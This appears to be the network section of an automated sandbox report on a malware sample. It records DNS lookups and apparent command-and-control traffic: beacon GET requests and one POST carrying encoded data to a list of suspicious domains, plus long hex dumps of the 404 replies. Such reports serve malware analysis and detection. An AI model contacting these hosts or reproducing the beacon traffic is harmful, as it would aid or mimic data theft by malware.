            Source: global trafficHTTP traffic detected: GET /csz1/?np=B1/oNyROsiSyJWt29sj2S0IFRvICl+iEjDCW2TmJGWt8WTZ/bsR6m46aAGz/4MK8zBu+cRD9UFqoGBqEMg6eGqtyx0Ndpfqa25N0T4jVP+zcs/aWlws8PlhiBv+1+sYYzcOzaf0=&O4s0=7rrhM HTTP/1.1Host: www.nevsehir-nakliyat.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
            Source: global trafficHTTP traffic detected: GET /wg84/?np=xCESFhhZDtyM/hr//j3ky1xZxbv/w7yscVTptQKfPtsk1ZKvJSltY0eiWzxDTaRBwjdwHUWMVo3i0crzNkgiJL1tOfgyOKUOFFDpBfdN6WGkZZw760Atp7sDgLoyqrjSo8Yq8vY=&O4s0=7rrhM HTTP/1.1Host: www.masteriocp.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
            Source: global trafficHTTP traffic detected: GET /09dt/?np=rbfG5gS9WKSJFi6SRtlEG1H5qgha+qyBcQUpaxDzzhML0bBwD+Qj3UGhdh/xQ289mI9ftdcjEJi/URIx5SNFY+8px5RXtAkGOTa83eEXxiWZoc8O/jqsRPGTy32XZb2ldw74hvQ=&O4s0=7rrhM HTTP/1.1Host: www.kryto.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
            Source: global trafficHTTP traffic detected: GET /efkd/?np=IufelbUCTKOeuwMC8EUMZp6RlpEgAJDIx1td5c35eyVbCG3IzyIKjn3SW0agpxesK9W5YHm3vT0AFFjY1MT7lhYpBivnSDbaB35/ERUm/0qpp+YY+ZI0WrG4EzYBf/iASgSBweg=&O4s0=7rrhM HTTP/1.1Host: www.angelenterprise.bizAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
            Source: global trafficDNS traffic detected: DNS query: www.nosr.net
            Source: global trafficDNS traffic detected: DNS query: www.monos.shop
            Source: global trafficDNS traffic detected: DNS query: www.complexity.pub
            Source: global trafficDNS traffic detected: DNS query: www.nevsehir-nakliyat.xyz
            Source: global trafficDNS traffic detected: DNS query: www.masteriocp.online
            Source: global trafficDNS traffic detected: DNS query: www.kryto.top
            Source: global trafficDNS traffic detected: DNS query: www.angelenterprise.biz
            Source: global trafficDNS traffic detected: DNS query: www.dyme.tech
            Source: unknownHTTP traffic detected: POST /4c7j/ HTTP/1.1Host: www.complexity.pubAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.5Content-Length: 207Connection: closeCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedOrigin: http://www.complexity.pubReferer: http://www.complexity.pub/4c7j/User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530Data Raw: 6e 70 3d 73 70 73 6e 35 38 38 54 47 41 6b 46 6e 77 30 41 31 53 68 69 73 6e 76 6f 56 6e 56 67 38 32 55 30 36 34 55 31 46 35 65 5a 46 41 47 75 44 78 78 53 6c 43 6c 54 48 5a 61 6f 35 6c 63 69 48 39 4a 54 49 69 6f 76 64 72 6d 64 77 55 79 31 6c 47 6c 6c 38 30 71 37 32 30 5a 68 70 4d 61 6f 69 50 6b 50 31 4e 48 73 41 39 58 42 4b 62 43 76 71 59 2f 78 78 46 33 49 51 68 4e 37 2b 5a 45 64 73 42 51 2b 38 2b 6c 79 41 7a 35 71 45 44 4a 4f 73 48 72 38 4a 52 66 63 52 70 50 4f 33 33 68 6e 4e 52 49 35 44 59 34 38 51 76 31 5a 34 66 37 74 65 36 41 64 6c 39 71 4f 73 6c 6c 31 4a 64 6a 52 6e 32 50 31 55 38 5a 75 79 69 64 30 56 55 2b 34 Data Ascii: np=spsn588TGAkFnw0A1ShisnvoVnVg82U064U1F5eZFAGuDxxSlClTHZao5lciH9JTIiovdrmdwUy1lGll80q720ZhpMaoiPkP1NHsA9XBKbCvqY/xxF3IQhN7+ZEdsBQ+8+lyAz5qEDJOsHr8JRfcRpPO33hnNRI5DY48Qv1Z4f7te6Adl9qOsll1JdjRn2P1U8Zuyid0VU+4
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 18 Sep 2024 07:02:37 GMTServer: ApacheAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Connection: closeTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Wed, 18 Sep 2024 07:03:02 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Wed, 18 Sep 2024 07:03:05 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Wed, 18 Sep 2024 07:03:07 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 601Connection: closeDate: Wed, 18 Sep 2024 07:03:10 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 44 69 65 20 61 6e 67 65 67 65 62 65 6e 65 20 53 65 69 74 65 20 6b 6f 6e 6e 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 77 65 72 64 65 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Die angegebene Seite konnte nicht gefunden werden. </p> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Wed, 18 Sep 2024 07:03:23 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-09-18T07:03:28.9027992Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 18 Sep 2024 07:03:44 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 16052X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 18 Sep 2024 07:03:46 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 16052X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d
